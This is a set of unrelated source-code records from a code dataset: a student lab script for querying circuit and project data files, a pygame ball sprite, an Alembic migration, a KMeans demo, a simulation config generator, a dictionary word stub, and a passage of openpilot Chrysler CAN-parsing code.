######################################################\n# Author : < Yanjun Chen >\n# email : < chen2620 >\n# ID : < ee364f21 >\n# Date : < 9/3/2019 >\n# ######################################################\n\nimport os # List of module import statements\nimport sys # Each one on a line\nimport glob\nfrom collections import namedtuple\nfrom pprint import pprint as pp\n\n#helper function\n##read projects.dat\n##return two maps: a[projectid] = circuitid\n## b[circuitid] = projectid\ndef readprojectid():\n with open('maps/projects.dat', 'r') as f:\n projects = f.readlines()[2:]\n\n targetcircuitid = {}\n targetprojectid = {}\n for project in projects:\n project = project.split()\n targetcircuitid[project[1]] = []\n targetprojectid[project[0]] = []\n\n for project in projects:\n project = project.split()\n targetcircuitid[project[1]].append(project[0]) #[projectid] = circuitid\n targetprojectid[project[0]].append(project[1]) #[circuitid] = projectid\n\n return (targetcircuitid,targetprojectid)\n\n##read student.dat\n##return a list with student name and ID\ndef readstudentid():\n with open('maps/students.dat', 'r') as f:\n students = f.readlines()[2:]\n studentlist = []\n Student = namedtuple(\"Student\",[\"name\",\"ID\"])\n for student in students:\n student = student.split()\n studentlist.append(Student(str(student[0]+' '+student[1]),student[3]))\n return studentlist\n\n##given a circuit ID, form it to a filename format\ndef helpreadcircuitfiles(circuitid):\n file = 'circuits/circuit_'+circuitid+'.dat'\n return readcircuitfiles(file)\n\n##given a filename of circuit, open the file\n##return student ID and component ID\ndef readcircuitfiles(file):\n with open(file, 'r') as f:\n components = f.readlines()\n index = components.index('Components:\\n')+2 #studentid + componentid\n\n name = []\n for names in components[2:index-3]:\n names = names.split()\n name.append(names[0])\n list = []\n for component in components[index:]:\n component = component.split()\n list.append(component[0])\n return (name,list)\n\n##given a symbol (\"R\"\"I\"\"C\"\"T\")\n##return all the component id and price\ndef readcomponent(componentSymbol):\n if (componentSymbol == \"R\"):\n file = 'resistors' # are identical\n elif (componentSymbol == \"I\"):\n file = 'inductors' # are identical\n elif (componentSymbol == \"C\"):\n file = 'capacitors' # are identical\n elif (componentSymbol == \"T\"):\n file = 'transistors' # are identical\n else:\n ValueError(\"symbol passed is incorrect\")\n\n with open('maps/'+file+'.dat', 'r') as f:\n components = f.readlines()[3:]\n\n componentid = {}\n for component in components:\n component = component.split()\n price = component[1].split('$')\n componentid[component[0]] = float(price[1])\n return componentid\n\n##given either student name or student id\n##return the student id or student full name\ndef readstudent(studentName,studentid):\n allstudent = readstudentid()\n if (studentid == None):\n for student in allstudent:\n if student.name == studentName:\n targetstudentid = student.ID\n return targetstudentid\n else:\n raise ValueError(\"student name passed does not exist\")\n elif (studentName == None):\n targetstudent = []\n for student in allstudent:\n if student.ID in studentid:\n targetstudent.append(student.name)\n if (targetstudent == []):\n raise ValueError(\"student ID passed does not exist\")\n return targetstudent\n\n# ######################################################\n#Task 10\ndef getCircuitByComponent(componentIDs):\n circuitid = set()\n for filename in 
glob.glob(os.path.join('circuits/*.dat')):\n _, components = readcircuitfiles(filename)\n for component in components:\n if component in componentIDs:\n file = filename.split('circuits/circuit_')\n file = (file[1]).split('.dat')[0] ##circuit ID\n circuitid.add(file)\n\n return circuitid\n\n#Task 9\ndef getCircuitByStudent(studentNames):\n circuitid = set()\n studentID = []\n for student in studentNames:\n studentID.append(readstudent(student,None))\n for filename in glob.glob(os.path.join('circuits/*.dat')):\n students, _ = readcircuitfiles(filename)\n for student in students:\n if student in studentID:\n file = filename.split('circuits/circuit_')\n file = (file[1]).split('.dat')[0] ##circuit ID\n circuitid.add(file)\n return circuitid\n\n#Task8\ndef getComponentReport(componentIDs):\n map = {}\n ##mapproject = {}\n for componentID in componentIDs:\n map[componentID] = 0\n ##mapproject[componentID] = set()\n\n _,targetprojectid = readprojectid()\n for filename in glob.glob(os.path.join('circuits/*.dat')):\n _, components = readcircuitfiles(filename)\n for component in components:\n if component in componentIDs:\n file = filename.split('circuits/circuit_')\n file = (file[1]).split('.dat')[0] ##circuit ID\n #for project in targetprojectid[file]: #find identical project\n #if project not in mapproject[component]:\n #mapproject[component].add(project)\n ##map[component] += 1\n #pp(targetprojectid[file])\n map[component] += len(targetprojectid[file])\n return map\n\n#Task7\ndef getCommonByProject(projectID1, projectID2):\n targetcircuitid, _ = readprojectid()\n try:\n circuitIDs1 = targetcircuitid[projectID1]\n except:\n raise ValueError(\"the project ID1 provided does not exists\")\n try:\n circuitIDs2 = targetcircuitid[projectID2]\n except:\n raise ValueError(\"the project ID2 provided does not exists\")\n\n componentlist1 = set()\n componentlist2 = set()\n for circuitID1 in circuitIDs1:\n _, component1 = helpreadcircuitfiles(circuitID1)\n componentlist1.update(component1)\n for circuitID2 in circuitIDs2:\n _, component2 = helpreadcircuitfiles(circuitID2)\n componentlist2.update(component2)\n\n return sorted(list(componentlist1 & componentlist2))\n\n#Task6\ndef getProjectByComponent(componentIDs):\n list = []\n for filename in glob.glob(os.path.join('circuits/*.dat')):\n _, components = readcircuitfiles(filename)\n for component in components:\n if component in componentIDs:\n file = filename.split('circuits/circuit_')\n file = (file[1]).split('.dat')[0] ##circuit ID\n list.append(file)\n\n # read project.dat to find project id\n _, targetprojectid = readprojectid()\n projectid = set()\n for circuitid in list:\n projectid.update(targetprojectid[circuitid])\n return projectid\n\n#Task5\ndef getCostOfProjects():\n # read project.dat\n targetcircuitid, _ = readprojectid()\n # read symbol.dat\n componentMapR = readcomponent(\"R\")\n componentMapI = readcomponent(\"I\")\n componentMapC = readcomponent(\"C\")\n componentMapT = readcomponent(\"T\")\n\n map = {}\n totalprice = 0\n for projectID in targetcircuitid.keys():\n circuitid = targetcircuitid[projectID]\n for circuit in circuitid:\n _,components = helpreadcircuitfiles(circuit)\n for component in components:\n if str(component) in componentMapR.keys():\n totalprice += componentMapR[component]\n elif str(component) in componentMapI.keys():\n totalprice += componentMapI[component]\n elif str(component) in componentMapC.keys():\n totalprice += componentMapC[component]\n elif str(component) in componentMapT.keys():\n totalprice += 
componentMapT[component]\n map[projectID] = round(totalprice,2)\n totalprice = 0\n return map\n\n#Task4\ndef getParticipationByProject(projectID):\n # read project.dat\n targetcircuitid, _ = readprojectid()\n try:\n circuitids = targetcircuitid[projectID]\n except:\n raise ValueError(\"the project ID provided does not exists\")\n\n studentids = []\n # read circuit.dat find which student participated\n for circuitid in circuitids:\n studentid,_ = helpreadcircuitfiles(circuitid)\n studentids += studentid ##stored all studentsID participated in the project\n\n studentID = readstudent(None,studentids)\n return set(studentID)\n\n#Task3\ndef getParticipationByStudent(studentName):\n # read student.dat get target student id\n studentid = readstudent(studentName,None)\n\n # read project.dat to find project id\n _, targetprojectid = readprojectid()\n projectid = set()\n # read all circuit.dat to find which circuit student participate\n for filename in glob.glob(os.path.join('circuits/*.dat')):\n ids, component = readcircuitfiles(filename)\n if studentid in ids:\n file = filename.split('circuits/circuit_')\n file = (file[1]).split('.dat')[0] #get circuit id only\n try:\n projectid.update(targetprojectid[file])\n except:\n print(\"can not find the projectID with given circuitID\")\n return projectid\n\n# Task2\ndef getComponentCountByStudent(studentName, componentSymbol):\n #read student.dat get target student id\n studentid = readstudent(studentName,None)\n componentdist = set()\n\n #read all circuit.dat\n componentlist = []\n count = 0\n for filename in glob.glob(os.path.join('circuits/*.dat')):\n ids,component = readcircuitfiles(filename)\n if studentid in ids:\n componentlist += component\n if componentlist == []:\n return 0\n componentMap = readcomponent(componentSymbol)\n for components in componentlist:\n if components in componentMap.keys():\n if components not in componentdist:\n count += 1\n componentdist.add(components)\n return count\n\n#Task1\ndef getComponentCountByProject(projectID, componentSymbol):\n #read project.dat\n targetcircuitid,_ = readprojectid()\n try:\n circuitids = targetcircuitid[projectID]\n except:\n raise ValueError(\"the project ID provided does not exists\")\n #read symbol.dat\n componentMap = readcomponent(componentSymbol)\n\n componentdist = set()\n\n #read components from different circuit.dat\n count = 0\n for circuitid in circuitids:\n _,components = helpreadcircuitfiles(circuitid)\n for component in components:\n if str(component) in componentMap.keys():\n if str(component) not in componentdist:\n count += 1\n componentdist.add(str(component))\n return count\n\n# # ######################################################\nif __name__ == \"__main__\":\n #task1\n #print(getComponentCountByProject(\"082D6241-40EE-432E-A635-65EA8AA374B61\", \"R\"))\n\n #task2\n #studentlist = readstudentid()\n #for student in studentlist:\n # print('student is '+ student.name, getComponentCountByStudent(student.name,\"R\"))\n #print(getComponentCountByStudent(\"Adams, Keit\",\"R\"))\n\n #task3\n #print(getParticipationByStudent(\"Adams, Keit\"))\n\n #task4\n #print(getParticipationByProject('082D6241-40EE-432E-A635-65EA8AA374B61'))\n\n #task5\n #print(getCostOfProjects())\n\n #task6\n #print(getProjectByComponent({'RNW-02','HRK-348','KSR-430'}))\n\n #task7\n #print(getCommonByProject(\"56B13184-D087-48DB-9CBA-84B40FE17CC5\", \"0F1FABFA-E112-4A66-A0B0-B7A2C14AD39A1\"))\n\n #task8\n #print(getComponentReport({'RTD-159', 'MGC-590', 'OLW-497', 'SLT-436', 'TMS-946'}))\n 
#print(getComponentReport({'MGC-59'}))\n\n #task9\n #print(getCircuitByStudent({\"Adams, Keit\",\"Alexander, Carlos\",\"Allen, Amanda\"}))\n\n #task10\n print(getCircuitByComponent({'SLT-436'}))\n pass\n","sub_path":"ECE364SoftwareEngineeringToolsLab/Prelab03/collectionTasks.py","file_name":"collectionTasks.py","file_ext":"py","file_size_in_byte":12098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419599372","text":"'''구현자: 2019038026 이혁수'''\r\nimport pygame\r\nfrom game.data.obj.Setting import setting as s\r\n\r\n\r\n\r\npygame.mixer.init()\r\nballsound=pygame.mixer.Sound('game/audio/tick.wav')\r\nballsound.set_volume(0.5)\r\n\r\ndef to_Zero(num):\r\n '''관성구현을 휘한 함수'''\r\n if num < 0:\r\n return 1*s.time_adjustment\r\n elif num > 0:\r\n return -1*s.time_adjustment\r\n else:\r\n return 0\r\n\r\n\r\nclass Ball(pygame.sprite.Sprite):\r\n def __init__(self, img, location, area): # 이미지,시작죄표, 반환점 좌표,넓이와 높이를 튜플로 전달 ex: (가로,세로),FPS\r\n pygame.sprite.Sprite.__init__(self) #스프라이트 초기화\r\n self.image = pygame.transform.scale(img, area) # 이미지의 크기를 내가 원하는 크기로 조정\r\n self.rect = self.image.get_rect() # 이미지의 사각형에 해당하는 범위를 가져옴\r\n self.rect.topleft = location #위치 설정\r\n self.mask = pygame.mask.from_surface(self.image)#충돌감지를 위한 마스크 생성\r\n\r\n #함수내용 구현시 필요 한것\r\n if s.FPS==60:\r\n self.gravity=s.MAX_SPEED/s.FPS*1.75 #왕복하는데 걸리는 프레임\r\n elif s.FPS==30:\r\n self.gravity = s.MAX_SPEED / s.FPS * 1.25\r\n\r\n self.speed=[0,0] #공의 속도를 조정 [x,y]\r\n self.dontchangespeed=0 # 좌우스피드 변경 불가능하게 하는 프레임수\r\n\r\n\r\n def move_y(self):\r\n '''y이동을 계산하는 함수로 y는 공기준으로 위가 - 아래가 +'''\r\n x,y=self.rect.center\r\n\r\n #속도변화\r\n self.speed[1]+=self.gravity\r\n\r\n #y이동\r\n y+=self.speed[1]\r\n self.rect.center=(x,y) #좌표값변경\r\n\r\n\r\n\r\n def move_x(self,a):\r\n '''x를 이동 a는 가속도(속도 최대 값 있음)'''\r\n #x는 공기준으로 오른쪽이 + 왼쪽이 -\r\n x,y=self.rect.center\r\n\r\n #속도변화\r\n if a==0:\r\n self.speed[0]+=to_Zero(self.speed[0])\r\n else:\r\n self.speed[0] += a*s.time_adjustment\r\n\r\n #최대 속도 제한\r\n if self.speed[0]<-s.MAX_SPEED:\r\n self.speed[0]=-s.MAX_SPEED\r\n\r\n elif self.speed[0]>s.MAX_SPEED:\r\n self.speed[0]=s.MAX_SPEED\r\n\r\n #x이동\r\n x += self.speed[0]\r\n self.rect.center=(x,y) #좌표값변경\r\n\r\n\r\n def movex(self):\r\n '''x를 외부 요인 없이 그냥이동'''\r\n x,y=self.rect.center\r\n\r\n x += self.speed[0]\r\n\r\n self.rect.center = (x, y) # 좌표값변경\r\n\r\n\r\n def move_check(self,key):\r\n '''어떻게 이동할 것인지 체크 후 이동'''\r\n if self.dontchangespeed==0:\r\n self.move_x(key)\r\n #x축 속도 변화 없음\r\n else:\r\n self.dontchangespeed-=1\r\n self.movex()\r\n\r\n self.move_y()\r\n\r\n if self.rect.top>s.height or self.rect.bottom<0:\r\n return 1\r\n elif self.rect.left<0:\r\n self.rect.left=0\r\n elif self.rect.right>s.width:\r\n self.rect.right=0\r\n\r\n return 0\r\n\r\n def speed_set_y(self,sp):\r\n '''y축 속도 변경'''\r\n self.speed[1]=sp\r\n '''if s.FPS==30:\r\n self.speed[1]+=1'''\r\n ballsound.play()\r\n\r\n def speed_set_x(self,s):\r\n '''x축 속도 변경'''\r\n self.speed[0]=s\r\n\r\n def get_speed_x(self):\r\n '''y의 속도를 받아옴'''\r\n return self.speed[0]\r\n\r\n def get_speed_y(self):\r\n '''y의 속도를 받아옴'''\r\n return self.speed[1]\r\n\r\n def get_speed(self,index=2):\r\n '''speed를 반환 인자로 0을 넣으면 x의 속도가 1을 넣으면 y의 속도가 반환 됨'''\r\n try:\r\n return self.speed[index]\r\n except IndexError:\r\n return self.speed\r\n\r\n def set_dontchangespeed(self):\r\n '''몇프레임 동안 못움직이게 하는지 체크하는 변수의 값변경'''\r\n self.dontchangespeed=s.FPS/6\r\n\r\n def reverse_speed_x(self):\r\n '''x축의 속도를 뒤집음(즉, 방향을 바꿈)'''\r\n self.speed[0]=-self.speed[0]\r\n\r\n 
def reverse_speed_y(self):\r\n '''y축의 속도를 뒤집음(즉, 방향을 바꿈)'''\r\n self.speed[1]=-self.speed[1]\r\n\r\n def get_center(self,index=2):\r\n '''rect.center를 반환 인자로 0을 넣으면 x좌표가 1을 넣으면 y좌표가 반환 됨'''\r\n try:\r\n return self.rect.center[index]\r\n except IndexError:\r\n return self.rect.center\r\n\r\n def set_location(self,loc):\r\n self.rect.center=loc","sub_path":"프로젝트/obj/Ball.py","file_name":"Ball.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"653925495","text":"\"\"\"chat table edit2\n\nRevision ID: 408f8eea220e\nRevises: \nCreate Date: 2018-05-16 03:38:36.735978\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '408f8eea220e'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('admin',\n sa.Column('n', sa.Integer(), nullable=False),\n sa.Column('password_hash_admin', sa.String(length=128), nullable=True),\n sa.Column('id', sa.String(length=128), nullable=True),\n sa.PrimaryKeyConstraint('n')\n )\n op.create_table('chat',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('group',\n sa.Column('group_image', sa.String(length=128), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('group_name', sa.String(length=64), nullable=True),\n sa.Column('creator', sa.Integer(), nullable=True),\n sa.Column('discussion', sa.String(length=128), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_group_creator'), 'group', ['creator'], unique=False)\n op.create_index(op.f('ix_group_discussion'), 'group', ['discussion'], unique=False)\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=128), nullable=True),\n sa.Column('email', sa.String(length=128), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('is_admin', sa.Boolean(), nullable=True),\n sa.Column('group', sa.Integer(), nullable=True),\n sa.Column('applicant', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)\n op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)\n op.create_table('chat_content',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('content', sa.String(length=128), nullable=True),\n sa.Column('author', sa.Integer(), nullable=True),\n sa.Column('chat_group', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['chat_group'], ['chat.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('post',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('context', sa.String(length=1024), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_post_context'), 'post', ['context'], unique=False)\n op.create_index(op.f('ix_post_timestamp'), 'post', ['timestamp'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_index(op.f('ix_post_timestamp'), table_name='post')\n op.drop_index(op.f('ix_post_context'), table_name='post')\n op.drop_table('post')\n op.drop_table('chat_content')\n op.drop_index(op.f('ix_user_username'), table_name='user')\n op.drop_index(op.f('ix_user_email'), table_name='user')\n op.drop_table('user')\n op.drop_index(op.f('ix_group_discussion'), table_name='group')\n op.drop_index(op.f('ix_group_creator'), table_name='group')\n op.drop_table('group')\n op.drop_table('chat')\n op.drop_table('admin')\n # ### end Alembic commands ###\n","sub_path":"Practice2/migrations/versions/408f8eea220e_chat_table_edit2.py","file_name":"408f8eea220e_chat_table_edit2.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"489543517","text":"import matplotlib\n\nmatplotlib.use('Qt5Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.cluster import KMeans\n\nX = np.array([\n [1, 2],\n [1.5, 1.8],\n [5, 8],\n [8, 8],\n [1, 0.6],\n [9, 11]\n])\n\n# plt.scatter(X[:,0],X[:, 1], s=150)\n# plt.show()\n\nclf = KMeans(n_clusters=2)\n# split into two clusters\nclf.fit(X)\n\ncentroids = clf.cluster_centers_\n# cluster centers\nlabels = clf.labels_\n# assigned cluster labels\n\ncolors = 10*[\"g\", 'r', 'c', 'k', 'b']\nfor i in range(len(X)):\n print(X[i][0], X[i][1])\n plt.scatter(X[i][0], X[i][1], c=colors[labels[i]], s=50)\nplt.scatter(centroids[:, 0], centroids[:, 1], marker='x', s=150)\n\nplt.show()\n","sub_path":"MachineLearning/clustering/k_means.py","file_name":"k_means.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"29697890","text":"# -*- coding: utf-8 -*-\n\n\"Creates input configuration files for SR simulation\"\n\nimport os\n\nfilebase = 'sr_const'\nstapleFile = 'snodin_staples'\njsonFile = 'snodin_unbound'\ntemplate = 'inps/input_template.inp'\n\ndef read_seqfile(filename):\n \"\"\"Read seq files in ??? 
format and strip metadata.\"\"\"\n with open(filename) as inp:\n seqs = inp.read().split('\\n')\n seqs = [seq for seq in seqs if not '>' in seq]\n seqs = [seq for seq in seqs if seq != '']\n\n return seqs # a list of string sequences\n\ndef change_param(tempParams, parameter, append):\n \"\"\"Changes the parameter from the input configuration template\"\"\"\n index = [k for k, s in enumerate(tempParams) if parameter in s][0]\n tempParams[index] = '{}={}'.format(parameter, append)\n return tempParams\n\nwith open(template, 'r') as file:\n params = file.readlines()\n\n# Make directory for outputs\nif not os.path.exists('configs'):\n os.makedirs('configs')\n\nnumberOfStaples = len(read_seqfile('inps/{}.seq'.format(stapleFile)))\n\nfor i in range(numberOfStaples + 1): # iterate through all simulation setups\n tempParams = params[:] # copy parameters without reference \n \n # Manually change the parameters that are different\n # Input JSON Filename\n keyword = 'origami_input_filename'\n newParam = '{}_{}.json\\n'.format(jsonFile, i)\n tempParams = change_param(tempParams, keyword, newParam)\n \n # Output Directory\n keyword = 'output_filebase'\n newParam = 'outs_{}/{}_{}\\n'.format(filebase, i, i)\n tempParams = change_param(tempParams, keyword, newParam) \n \n # Create the input configuration file\n output = 'configs/{}_{}.inp'.format(filebase, i)\n with open(output, 'w') as file:\n file.writelines(tempParams)","sub_path":"scripts/investigation/single-removal/create_sr_input-configs.py","file_name":"create_sr_input-configs.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"595448570","text":"\n\n#calss header\nclass _RAPE():\n\tdef __init__(self,): \n\t\tself.name = \"RAPE\"\n\t\tself.definitions = [u'(an example of) the crime of forcefully having sex with someone against their wishes: ', u'destruction of the natural world, often for profit: ', u'a plant with yellow flowers from which oil and animal food are produced']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_rape.py","file_name":"_rape.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"177090160","text":"from cereal import car\nfrom opendbc.can.parser import CANParser\nfrom opendbc.can.can_define import CANDefine\nfrom selfdrive.car.chrysler.chryslerlonghelper import SET_SPEED_MIN\nfrom selfdrive.config import Conversions as CV\nfrom selfdrive.car.interfaces import CarStateBase\nfrom selfdrive.car.chrysler.values import DBC, STEER_THRESHOLD\nfrom common.params import Params\n\n\nclass CarState(CarStateBase):\n def __init__(self, CP):\n super().__init__(CP)\n can_define = CANDefine(DBC[CP.carFingerprint][\"pt\"])\n self.shifter_values = can_define.dv[\"GEAR\"][\"PRNDL\"]\n self.acc_on_button = False\n self.veh_on_timer = 0\n self.axle_torq = 0\n\n def update(self, cp, cp_cam):\n\n ret = car.CarState.new_message()\n\n ret.doorOpen = any([cp.vl[\"DOORS\"][\"DOOR_OPEN_FL\"],\n cp.vl[\"DOORS\"][\"DOOR_OPEN_FR\"],\n cp.vl[\"DOORS\"][\"DOOR_OPEN_RL\"],\n cp.vl[\"DOORS\"][\"DOOR_OPEN_RR\"]])\n ret.seatbeltUnlatched = cp.vl[\"SEATBELT_STATUS\"][\"SEATBELT_DRIVER_UNLATCHED\"] == 1\n\n ret.brakePressed = cp.vl[\"BRAKE_2\"][\"BRAKE_PEDAL\"] == 1 # driver-only\n 
ret.brake = cp.vl[\"BRAKE_1\"][\"BRAKE_VAL_TOTAL\"]\n ret.brakeLights = bool(cp.vl[\"BRAKE_2\"][\"BRAKE_LIGHT\"])\n ret.gas = cp.vl[\"ACCEL_GAS_22F\"][\"GAS_PEDAL_POS\"]\n ret.gasPressed = ret.gas > 1e-5\n\n ret.espDisabled = (cp.vl[\"TRACTION_BUTTON\"][\"TRACTION_OFF\"] == 1)\n\n ret.wheelSpeeds.fl = cp.vl[\"WHEEL_SPEEDS\"][\"WHEEL_SPEED_FL\"]\n ret.wheelSpeeds.rr = cp.vl[\"WHEEL_SPEEDS\"][\"WHEEL_SPEED_RR\"]\n ret.wheelSpeeds.rl = cp.vl[\"WHEEL_SPEEDS\"][\"WHEEL_SPEED_RL\"]\n ret.wheelSpeeds.fr = cp.vl[\"WHEEL_SPEEDS\"][\"WHEEL_SPEED_FR\"]\n ret.vEgoRaw = cp.vl[\"BRAKE_1\"][\"VEHICLE_SPEED_KPH\"] * CV.KPH_TO_MS\n ret.vEgo, ret.aEgo = self.update_speed_kf(ret.vEgoRaw)\n ret.standstill = bool(cp.vl[\"BRAKE_1\"][\"STANDSTILL\"])\n self.long_accel = cp.vl[\"INERTIAL_SENSOR\"][\"LONG_ACCEL\"]\n self.hill_accel_raw = self.long_accel - ret.aEgo\n self.hill_accel, self.hill_accel_rate = self.update_hill_kf(self.hill_accel_raw)\n\n ret.leftBlinker = cp.vl[\"STEERING_LEVERS\"][\"TURN_SIGNALS\"] == 1\n ret.rightBlinker = cp.vl[\"STEERING_LEVERS\"][\"TURN_SIGNALS\"] == 2\n ret.steeringAngleDeg = cp.vl[\"STEERING\"][\"STEER_ANGLE\"]\n ret.steeringRateDeg = cp.vl[\"STEERING\"][\"STEERING_RATE\"]\n ret.gearShifter = self.parse_gear_shifter(self.shifter_values.get(cp.vl[\"GEAR\"][\"PRNDL\"], None))\n\n self.acc_on_button_prev = self.acc_on_button\n self.acc_on_button = bool(cp.vl[\"WHEEL_BUTTONS\"][\"ACC_BUTTON_ON\"])\n\n ret.cruiseState.enabled = bool(cp.vl[\"ACC_2\"][\"ACC_ENABLED\"]) # ACC is green.\n ret.cruiseState.available = bool(cp.vl[\"ACC_2\"][\"ACC_AVAILABLE\"])\n ret.cruiseState.speed = max(cp.vl[\"DASHBOARD\"][\"ACC_SET_SPEED_MPH\"] * CV.MPH_TO_MS, SET_SPEED_MIN)\n # CRUISE_STATE is a three bit msg, 0 is off, 1 and 2 are Non-ACC mode, 3 and 4 are ACC mode, find if there are other states too\n ret.cruiseState.nonAdaptive = cp.vl[\"DASHBOARD\"][\"CRUISE_STATE\"] in [1, 2]\n\n ret.steeringTorque = cp.vl[\"EPS_STATUS\"][\"TORQUE_DRIVER\"]/4\n ret.steeringTorqueEps = cp.vl[\"EPS_STATUS\"][\"TORQUE_MOTOR\"]/4 if Params().get_bool(\"ChryslerMangoLat\") else cp.vl[\"EPS_STATUS\"][\"TORQUE_MOTOR\"]\n ret.steeringPressed = abs(ret.steeringTorque) > STEER_THRESHOLD/4\n self.steerError = cp.vl[\"EPS_STATUS\"][\"LKAS_STEER_FAULT\"] == 4\n self.apaFault = cp.vl[\"EPS_STATUS\"][\"APA_STEER_FAULT\"] == 1\n self.apasteerOn = cp.vl[\"EPS_STATUS\"][\"APA_ACTIVE\"] == 1\n\n ret.genericToggle = bool(cp.vl[\"STEERING_LEVERS\"][\"HIGH_BEAM_FLASH\"])\n\n if self.CP.enableBsm:\n ret.leftBlindspot = cp.vl[\"BLIND_SPOT_WARNINGS\"][\"BLIND_SPOT_LEFT\"] == 1\n ret.rightBlindspot = cp.vl[\"BLIND_SPOT_WARNINGS\"][\"BLIND_SPOT_RIGHT\"] == 1\n\n self.lkas_counter = cp_cam.vl[\"LKAS_COMMAND\"][\"COUNTER\"]\n self.lkas_status_ok = cp_cam.vl[\"LKAS_HEARTBIT\"][\"LKAS_BUTTON_LED\"]\n self.apa_steer_status = cp.vl[\"AUTO_PARK_REQUEST\"][\"APA_STEER_ACT\"] == 1\n if self.CP.enablehybridEcu:\n if cp.vl[\"HYBRID_ECU\"][\"VEH_ON\"] == 1:\n self.veh_on_timer += 1\n else:\n self.veh_on_timer = 0\n self.veh_on = self.veh_on_timer >= 50\n self.axle_torq = cp.vl[\"AXLE_TORQ\"][\"AXLE_TORQ\"]\n self.axle_torq_max = cp.vl[\"AXLE_TORQ\"][\"AXLE_TORQ_MAX\"]\n self.axle_torq_min = cp.vl[\"AXLE_TORQ\"][\"AXLE_TORQ_MIN\"]\n self.hybrid_power_meter = cp.vl[\"HEV_HMI\"][\"ELEC_MODE_PERCENT\"]\n else:\n self.veh_on_timer += 1\n self.veh_on = self.veh_on_timer >= 200\n self.axle_torq_min = 20.\n self.axle_torq_max = 300.\n self.hybrid_power_meter = 1\n\n self.acc_hold = bool(cp.vl[\"ACC_2\"][\"ACC_STOP\"])\n self.lead_dist = 
cp.vl[\"DASHBOARD\"][\"LEAD_DIST\"]\n self.wheel_button_counter = cp.vl[\"WHEEL_BUTTONS\"][\"COUNTER\"]\n\n self.acc_cancel_button = bool(cp.vl[\"WHEEL_BUTTONS\"][\"ACC_CANCEL\"])\n self.acc_resume_button = bool(cp.vl[\"WHEEL_BUTTONS\"][\"ACC_RESUME\"])\n self.acc_setplus_button = bool(cp.vl[\"WHEEL_BUTTONS\"][\"ACC_SPEED_INC\"])\n self.acc_setminus_button = bool(cp.vl[\"WHEEL_BUTTONS\"][\"ACC_SPEED_DEC\"])\n self.acc_followdec_button = bool(cp.vl[\"WHEEL_BUTTONS\"][\"ACC_FOLLOW_DEC\"])\n self.acc_followinc_button = bool(cp.vl[\"WHEEL_BUTTONS\"][\"ACC_FOLLOW_INC\"])\n\n self.acc_button_pressed = self.acc_cancel_button or self.acc_resume_button or self.acc_setplus_button or \\\n self.acc_setminus_button or self.acc_followdec_button or self.acc_followinc_button\n\n ret.accgasOverride = bool(cp.vl[\"ACCEL_RELATED_120\"][\"ACC_OVERRIDE\"])\n self.accbrakeFaulted = ((cp.vl[\"BRAKE_2\"][\"ACC_BRAKE_FAIL\"]) > 0) or ((cp.vl[\"ACC_ERROR\"][\"ACC_ERROR\"]) > 0)\n self.accengFaulted = (cp.vl[\"ACCEL_RELATED_120\"][\"ACC_ENG_OK\"]) == 0\n\n return ret\n\n @staticmethod\n def get_can_parser(CP):\n signals = [\n # sig_name, sig_address, default\n (\"PRNDL\", \"GEAR\", 0),\n (\"DOOR_OPEN_FL\", \"DOORS\", 0),\n (\"DOOR_OPEN_FR\", \"DOORS\", 0),\n (\"DOOR_OPEN_RL\", \"DOORS\", 0),\n (\"DOOR_OPEN_RR\", \"DOORS\", 0),\n (\"BRAKE_PEDAL\", \"BRAKE_2\", 0),\n (\"GAS_PEDAL_POS\", \"ACCEL_GAS_22F\", 0),\n (\"WHEEL_SPEED_FL\", \"WHEEL_SPEEDS\", 0),\n (\"WHEEL_SPEED_RR\", \"WHEEL_SPEEDS\", 0),\n (\"WHEEL_SPEED_RL\", \"WHEEL_SPEEDS\", 0),\n (\"WHEEL_SPEED_FR\", \"WHEEL_SPEEDS\", 0),\n (\"STEER_ANGLE\", \"STEERING\", 0),\n (\"STEERING_RATE\", \"STEERING\", 0),\n (\"TURN_SIGNALS\", \"STEERING_LEVERS\", 0),\n (\"ACC_ENABLED\", \"ACC_2\", 